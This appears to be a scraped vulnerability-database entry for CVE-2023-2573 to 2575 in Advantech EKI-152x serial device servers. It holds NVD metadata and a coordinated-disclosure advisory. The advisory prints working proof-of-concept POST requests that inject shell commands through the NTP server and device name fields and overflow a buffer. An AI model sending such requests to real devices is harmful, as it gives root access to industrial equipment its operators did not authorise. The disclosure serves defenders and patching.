  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "office@cyberdanube.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-05-08T13:15:09.710",
  "references": [
    {
      "source": "office@cyberdanube.com",
      "url": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html"
    },
    {
      "source": "office@cyberdanube.com",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2023/May/4"
    },
    {
      "source": "office@cyberdanube.com",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
    },
    {
      "source": "office@cyberdanube.com",
      "tags": [
        "Patch",
        "Product"
      ],
      "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL"
    },
    {
      "source": "office@cyberdanube.com",
      "tags": [
        "Patch",
        "Product"
      ],
      "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT"
    },
    {
      "source": "office@cyberdanube.com",
      "tags": [
        "Patch",
        "Product"
      ],
      "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2023/May/4"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Product"
      ],
      "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Product"
      ],
      "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Product"
      ],
      "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3"
    }
  ],
  "sourceIdentifier": "office@cyberdanube.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "office@cyberdanube.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-77"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

VAR-202305-0371

Vulnerability from variot - Updated: 2023-12-18 11:54

Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request. Advantech Co., Ltd. eki-1521 firmware, eki-1522 firmware, eki-1524 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. CyberDanube Security Research 20230511-0

            title| Multiple Vulnerabilities
          product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series

Vendor description

"Advantech\x92s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence."

Source: https://www.advantech.com/en/about

Vulnerable versions

EKI-1524-CE series / 1.21 EKI-1522-CE series / 1.21 EKI-1521-CE series / 1.21

Vulnerability overview

1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574) The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks to the device from malicious actors. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked. The following proof-of-concepts show how to inject commands to the system which gets executed with root permissions in the background:

1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573) The following POST request executes the command \x93;ping 10.0.0.1\x94 on the system: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: / Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

=============================================================================== It is also possible to execute this command without any interceptor proxy by enclose it with ";", which results in the string \x93;ping 10.0.0.1;\x94.

1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574) The device name can also be abused for command injection. It is only executed on reboot, but this can also be done via the device\x92s web-interface. A POST request which injects the command \x93;ls /etc;\x94 can be looks like the following: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: / Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

=============================================================================== Such command can also be injected by setting the device name to \x93;ls /etc;\x94.

2) Buffer Overflow (CVE-2023-2575) The following POST request can be used to trigger a buffer overflow vulnerability in the web server: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.97 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: / Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 823 Origin: http://172.16.0.97 Connection: close Referer: http://172.16.0.97/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

The serial port of the device provides error messages, which already indicate that the stack has been corrupted: / # *** Error in ./index.cgi': free(): invalid next size (normal): 0x00069828 *** *** Error in./index.cgi': malloc(): memory corruption: 0x00069898 ***

Furthermore, the forked child processes seem to remain in the process list as zombies - three buffer overflows were triggered in this case: / # ps PID USER COMMAND [...] 935 root ./index.cgi func=setsys 959 root ./index.cgi func=setsys 983 root ./index.cgi func=setsys [...]

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Update the product to the latest available firmware version.

Workaround

None

Recommendation

CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.

Contact Timeline

2023-03-08: Contacting Advantech via Service Request form; No answer. 2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware until 2023-05-13. Asked vendor for affected models; Vendo responded that EKI-1524/1522/1521 series are affected. 2023-03-20: Asked for status update. 2023-03-21: Vendor responded that the firmware is currently under testing. 2023-03-31: Vendor statet, that firmware is done and sent it via email; Found additional issues and responded to vendor. 2023-04-01: Vendor asked multiple question. 2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed. 2023-04-04: Set date for a call to 2023-04-10. 2023-04-10: Clarified further issues. 2023-04-23: Vendor sent notification that a beta release of the firmware is available. 2023-05-02: Vendor sent notification that a new firmware release is online. 2023-05-04: Asked vendor if the advisory can be published earlier than agreed. 2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed. 2023-05-11: Coordinated release of security advisory.

Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com

EOF S. Dietz, T. Weber / @2023

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202305-0371",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "eki-1524",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "advantech",
        "version": "1.21"
      },
      {
        "model": "eki-1521",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "advantech",
        "version": "1.21"
      },
      {
        "model": "eki-1522",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "advantech",
        "version": "1.21"
      },
      {
        "model": "eki-1521",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e",
        "version": null
      },
      {
        "model": "eki-1522",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e",
        "version": null
      },
      {
        "model": "eki-1524",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-009953"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-2573"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:advantech:eki-1521_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.21",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:advantech:eki-1521:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:advantech:eki-1522_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.21",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:advantech:eki-1522:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:advantech:eki-1524_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.21",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:advantech:eki-1524:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2023-2573"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "T. Weber",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202305-383"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2023-2573",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2023-2573",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2023-2573",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "office@cyberdanube.com",
            "id": "CVE-2023-2573",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202305-383",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-009953"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-2573"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-2573"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202305-383"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request. Advantech Co., Ltd. eki-1521 firmware, eki-1522 firmware, eki-1524 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. CyberDanube Security Research 20230511-0\n-------------------------------------------------------------------------------\n                title| Multiple Vulnerabilities\n              product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series\n   vulnerable version| 1.21\n        fixed version| 1.24\n           CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575\n               impact| High\n             homepage| https://advantech.com\n                found| 2023-03-06\n                   by| S. Dietz, T. Weber (Office Vienna)\n                     | CyberDanube Security Research\n                     | Vienna | St. P\\xf6lten\n                     |\n                     | https://www.cyberdanube.com\n-------------------------------------------------------------------------------\n\nVendor description\n-------------------------------------------------------------------------------\n\"Advantech\\x92s corporate vision is to enable an intelligent planet. The company\nis a global leader in the fields of IoT intelligent systems and embedded\nplatforms. To embrace the trends of IoT, big data, and artificial intelligence,\nAdvantech promotes IoT hardware and software solutions with the Edge\nIntelligence WISE-PaaS core to assist business partners and clients in\nconnecting their industrial chains. Advantech is also working with business\npartners to co-create business ecosystems that accelerate the goal of\nindustrial intelligence.\"\n\nSource: https://www.advantech.com/en/about\n\n\nVulnerable versions\n-------------------------------------------------------------------------------\nEKI-1524-CE series / 1.21\nEKI-1522-CE series / 1.21\nEKI-1521-CE series / 1.21\n\nVulnerability overview\n-------------------------------------------------------------------------------\n1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574)\nThe web server of the device is prone to two authenticated command injections. \nThese allow an attacker to gain full access to the underlying operating system\nof the device. This device class can be attached to legacy systems via RS-232,\nRS-422 or RS-485. Such peripheral systems can be affected by attacks to the\ndevice from malicious actors. According to the vendor, the NTP\nserver string is expected to be 64 bytes long, which is not correctly checked. The following proof-of-concepts show how to inject commands to the\nsystem which gets executed with root permissions in the background:\n\n1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573)\nThe following POST request executes the command \\x93;ping 10.0.0.1\\x94 on the system:\n===============================================================================\nPOST /cgi-bin/index.cgi?func=setsys HTTP/1.1\nHost: 172.16.0.100\nAccept: */*\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 541\nOrigin: http://172.16.0.100\nConnection: close\nReferer: http://172.16.0.100/cgi-bin/index.cgi\n\nweb_en=1\u0026resume_idx=0\u0026sys_name=test\u0026sys_desc=\u0026ignr_devid=0\u0026tel_en=1\u0026snmp_en=1\u0026year_name=2023\u0026mon_name=5\u0026day_name=8\u0026hour_name=6\u0026min_name=45\u0026sec_name=18\u0026tz=UTC12%3A0\u0026ntp_name=;ping+10.0.0.1;\u0026dayligt_saving_time=0\u0026start_week=1\u0026start_day=0\u0026start_month=1\u0026start_time=\u0026end_week=1\u0026end_day=0\u0026end_month=1\u0026end_time=\u0026dst_timezone=\u0026slave_port=\u0026redt_num=%25REDTNUM%25\u0026redtID%25REDTNUM%25=%25REDTID%25\u0026priPath%25REDTNUM%25=%25PRIPATH%25\u0026secPath%25REDTNUM%25=%25SECPATH%25\u0026interface=0\u0026virtual_ip=%25VIRTGW_IP%25\u0026id=%25VIRTGW_ID%25\u0026priority=80\n\n===============================================================================\nIt is also possible to execute this command without any interceptor proxy by\nenclose it with \";\", which results in the string \\x93;ping 10.0.0.1;\\x94. \n\n1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574)\nThe device name can also be abused for command injection. It is only executed\non reboot, but this can also be done via the device\\x92s web-interface. A POST\nrequest which injects the command \\x93;ls /etc;\\x94 can be looks like the following:\n===============================================================================\nPOST /cgi-bin/index.cgi?func=setsys HTTP/1.1\nHost: 172.16.0.100\nAccept: */*\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 541\nOrigin: http://172.16.0.100\nConnection: close\nReferer: http://172.16.0.100/cgi-bin/index.cgi\n\nweb_en=1\u0026resume_idx=0\u0026sys_name=;ls+/etc;\u0026sys_desc=\u0026ignr_devid=0\u0026tel_en=1\u0026snmp_en=1\u0026year_name=2023\u0026mon_name=5\u0026day_name=8\u0026hour_name=6\u0026min_name=45\u0026sec_name=18\u0026tz=UTC12%3A0\u0026ntp_name=\u0026dayligt_saving_time=0\u0026start_week=1\u0026start_day=0\u0026start_month=1\u0026start_time=\u0026end_week=1\u0026end_day=0\u0026end_month=1\u0026end_time=\u0026dst_timezone=\u0026slave_port=\u0026redt_num=%25REDTNUM%25\u0026redtID%25REDTNUM%25=%25REDTID%25\u0026priPath%25REDTNUM%25=%25PRIPATH%25\u0026secPath%25REDTNUM%25=%25SECPATH%25\u0026interface=0\u0026virtual_ip=%25VIRTGW_IP%25\u0026id=%25VIRTGW_ID%25\u0026priority=80\n\n===============================================================================\nSuch command can also be injected by setting the device name to \\x93;ls /etc;\\x94. \n\n\n2) Buffer Overflow (CVE-2023-2575)\nThe following POST request can be used to trigger a buffer overflow\nvulnerability in the web server:\n===============================================================================\nPOST /cgi-bin/index.cgi?func=setsys HTTP/1.1\nHost: 172.16.0.97\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 823\nOrigin: http://172.16.0.97\nConnection: close\nReferer: http://172.16.0.97/cgi-bin/index.cgi\n\nweb_en=1\u0026resume_idx=0\u0026sys_name=test\u0026sys_desc=\u0026ignr_devid=0\u0026tel_en=1\u0026snmp_en=1\u0026year_name=2023\u0026mon_name=5\u0026day_name=8\u0026hour_name=7\u0026min_name=2\u0026sec_name=52\u0026tz=UTC12%3A0\u0026ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u0026dayligt_saving_time=0\u0026start_week=1\u0026start_day=0\u0026start_month=1\u0026start_time=\u0026end_week=1\u0026end_day=0\u0026end_month=1\u0026end_time=\u0026dst_timezone=\u0026slave_port=\u0026redt_num=%25REDTNUM%25\u0026redtID%25REDTNUM%25=%25REDTID%25\u0026priPath%25REDTNUM%25=%25PRIPATH%25\u0026secPath%25REDTNUM%25=%25SECPATH%25\u0026interface=0\u0026virtual_ip=%25VIRTGW_IP%25\u0026id=%25VIRTGW_ID%25\u0026priority=80\n===============================================================================\n\nThe serial port of the device provides error messages, which already indicate\nthat the stack has been corrupted:\n/ # *** Error in `./index.cgi\u0027: free(): invalid next size (normal): 0x00069828 ***\n*** Error in `./index.cgi\u0027: malloc(): memory corruption: 0x00069898 ***\n\nFurthermore, the forked child processes seem to remain in the process list as\nzombies - three buffer overflows were triggered in this case:\n/ # ps\nPID   USER     COMMAND\n[...]\n  935 root     ./index.cgi func=setsys\n  959 root     ./index.cgi func=setsys\n  983 root     ./index.cgi func=setsys\n[...]\n\n\nThe vulnerabilities were manually verified on an emulated device by using the\nMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). \n\n\nSolution\n-------------------------------------------------------------------------------\nUpdate the product to the latest available firmware version. \n\n\nWorkaround\n-------------------------------------------------------------------------------\nNone\n\n\nRecommendation\n-------------------------------------------------------------------------------\nCyberDanube recommends Advantech customers to upgrade the firmware to the\nlatest version available. \n\n\nContact Timeline\n-------------------------------------------------------------------------------\n2023-03-08: Contacting Advantech via Service Request form; No answer. \n2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz);\n            Vendor confirmed vulnerabilities and will provide a fixed firmware\n            until 2023-05-13. Asked vendor for affected models; Vendo\n            responded that EKI-1524/1522/1521 series are affected. \n2023-03-20: Asked for status update. \n2023-03-21: Vendor responded that the firmware is currently under testing. \n2023-03-31: Vendor statet, that firmware is done and sent it via email; Found\n            additional issues and responded to vendor. \n2023-04-01: Vendor asked multiple question. \n2023-04-02: Responded to vendor, answered questions and asked for a call;\n            Vendor agreed. \n2023-04-04: Set date for a call to 2023-04-10. \n2023-04-10: Clarified further issues. \n2023-04-23: Vendor sent notification that a beta release of the firmware is\n            available. \n2023-05-02: Vendor sent notification that a new firmware release is online. \n2023-05-04: Asked vendor if the advisory can be published earlier than agreed. \n2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities\n            have been fixed. \n2023-05-11: Coordinated release of security advisory. \n\nWeb: https://www.cyberdanube.com\nTwitter: https://twitter.com/cyberdanube\nMail: research at cyberdanube dot com\n\nEOF S. Dietz, T. Weber / @2023\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2023-2573"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-009953"
      },
      {
        "db": "VULMON",
        "id": "CVE-2023-2573"
      },
      {
        "db": "PACKETSTORM",
        "id": "172307"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
